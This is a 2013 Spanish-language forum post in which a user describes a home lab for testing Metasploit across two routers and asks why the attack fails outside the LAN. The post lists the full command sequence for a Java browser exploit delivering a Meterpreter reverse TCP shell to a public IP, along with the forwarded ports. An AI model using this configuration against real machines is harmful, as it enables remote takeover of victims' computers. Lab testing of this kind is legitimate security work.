Título: Metasploit out of LAN Publicado por: TapIt en 10 Junio 2013, 20:57 pm Buenas a todos:
He visto temas parecidos por el foro pero en ninguno se llega a ninguna conclusión sobre el problema. He montado en casa un laboratorio para testear Metasploit fuera de LAN compuesto por dos ordenadores conectados a 2 routers diferentes de IP pública diferente. MAQUINA1 PC corriendo Máquina Virtual Kali Linux IP privada 192.168.1.16 IP publica 88.88.88.88 (inventada por motivos de seguridad) El router tiene los puertos (80,445 y 4444) fordwardeados a la IP 192.168.1.16 MAQUINA2 Laptot corriendo Máquina Virtual Windows XP SP2 (Java 7 update 6) El router se supone que no es necesario que tenga ningún puerto abierto puesto que cuando se ejecuta el exploit entra en juego NATP ******************************************************* En la MAQUINA1 use exploit/multi/browser/java_jre17_reflection_types set SRVHOST 192.168.1.16 set SRVPORT 80 set URIPATH /ataque set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 88.88.88.88 exploit En la MAQUINA2 Entro en la URL a través del navegador en la URL 88.88.88.88/ataque Saltan las alertas de ejecutar un applet de java etc... ACEPTO TODO y parece que se empieza a ejecutar el Applet pero salta una alerta que dice "No se pudo ejecutar el programa". Metasploit se queda a la espera de un sesión pero no sucede nada... Sinceramente no se que ocurre. He probado el mismo ataque en local y no hay problemas. ¿Alguna idea? Gracias por adelantado, Saludos ;) |